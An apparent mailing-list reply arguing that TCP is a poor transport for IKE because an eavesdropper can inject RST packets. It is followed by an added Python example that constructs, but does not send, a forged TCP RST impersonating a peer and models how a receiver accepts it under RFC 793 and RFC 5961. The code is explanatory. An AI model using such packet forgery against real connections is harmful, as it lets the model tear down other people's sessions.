
Re: IKE transport (was INITIAL-CONTACT issues)



> >that one of the original design requirements was transport independence,
> >and also that a DoS attack might be easier to mount if the transport was
> >TCP, meaning that there would be more (useless) work per packet for TCP. 
> 
> I am not very clear on the DoS attack issues. It is my understanding
> many web servers run into this problem and have addressed the DoS
> attack problem for TCP at a system level.

The web servers have fixed the SYN-flooding attack.

There is nothing to stop malicious injections of RST packets into a TCP
stream.  This is the biggest reason to not use TCP for IKE.  You'll never get
past the 3-way handshake if you have a malicious eavesdropper.

Dan
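The RST-injection point above, as an added example that is not part of the original thread and is not code from the IPsec working group: it builds (but does not send) the RST segment an on-path eavesdropper would forge after seeing one segment of a TCP connection, and models how the receiver treats it. The addresses, ports (port 500 for a hypothetical IKE-over-TCP listener) and sequence numbers are constructed sample values. The receiver model also covers RFC 5961 challenge ACKs, which is why being on-path matters: the eavesdropper knows the exact sequence number, so the stricter check does not help the victim, whereas a blind attacker would have to guess it.

```python
import struct
from dataclasses import dataclass
from ipaddress import IPv4Address


@dataclass
class Observed:
    """Fields an on-path eavesdropper reads from one TCP segment (constructed sample)."""
    src: str
    dst: str
    sport: int
    dport: int
    seq: int
    ack: int
    window: int


# Constructed sample: the responder's SYN-ACK on a hypothetical IKE-over-TCP connection.
# Its ack field is exactly the responder's RCV.NXT, which is what a RST needs to carry.
SAMPLE = Observed(src="192.0.2.10", dst="198.51.100.7", sport=500, dport=40000,
                  seq=0x11223344, ack=0x55667789, window=65535)


def checksum(data: bytes) -> int:
    """Internet (ones'-complement) checksum; returns 0 when run over data that already carries a valid checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def forge_rst(obs: Observed) -> bytes:
    """Raw IPv4+TCP RST aimed at obs.src, impersonating obs.dst.

    The forged segment's seq is obs.ack: the value the victim expects next from its peer,
    which the eavesdropper learned simply by watching the segment go by.
    """
    src = IPv4Address(obs.dst).packed  # impersonate the peer
    dst = IPv4Address(obs.src).packed
    # data offset 5 words, flags = RST (0x04), window 0, checksum placeholder, no urgent pointer
    tcp = struct.pack("!HHIIBBHHH", obs.dport, obs.sport, obs.ack, 0, 5 << 4, 0x04, 0, 0, 0)
    pseudo = src + dst + struct.pack("!BBH", 0, 6, len(tcp))
    tcp = tcp[:16] + struct.pack("!H", checksum(pseudo + tcp)) + tcp[18:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0, src, dst)
    ip = ip[:10] + struct.pack("!H", checksum(ip)) + ip[12:]
    return ip + tcp


def parse(pkt: bytes) -> dict:
    """Decode the forged packet and verify both checksums, as the victim's stack would."""
    _, _, _, _, _, _, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    sport, dport, seq, _, _, flags, _, _, _ = struct.unpack("!HHIIBBHHH", pkt[20:40])
    pseudo = src + dst + struct.pack("!BBH", 0, proto, len(pkt) - 20)
    return {"src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
            "sport": sport, "dport": dport, "seq": seq, "rst": bool(flags & 0x04),
            "ip_ok": checksum(pkt[:20]) == 0, "tcp_ok": checksum(pseudo + pkt[20:]) == 0}


def rst_accepted(rcv_nxt: int, rcv_wnd: int, rst_seq: int, rfc5961: bool) -> str:
    """Receiver's RST handling.

    RFC 793: any in-window seq resets the connection.
    RFC 5961 section 3.2: only seq == RCV.NXT resets; in-window but inexact gets a challenge ACK
    (the connection survives); out-of-window is dropped.
    """
    if rst_seq == rcv_nxt:
        return "reset"
    if (rst_seq - rcv_nxt) % 2**32 < rcv_wnd:
        return "challenge-ack" if rfc5961 else "reset"
    return "dropped"


def blind_guesses(window: int, rfc5961: bool) -> int:
    """Expected RSTs an off-path (blind) attacker must send to hit an acceptable seq."""
    return 2**32 if rfc5961 else 2**32 // window


if __name__ == "__main__":
    pkt = forge_rst(SAMPLE)
    print(parse(pkt))
    print("on-path, RFC 5961:", rst_accepted(SAMPLE.ack, SAMPLE.window, parse(pkt)["seq"], True))
    print("blind guesses (793 / 5961):", blind_guesses(SAMPLE.window, False), blind_guesses(SAMPLE.window, True))
```

The eavesdropper's forged RST lands exactly on RCV.NXT and is accepted under either rule set; the same segment sent blind would need on the order of 2^32/window attempts under RFC 793 and 2^32 under RFC 5961. Note that this is why a TCP transport cannot be protected by anything IKE itself does: the RST is processed by the kernel before any IKE payload is seen.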

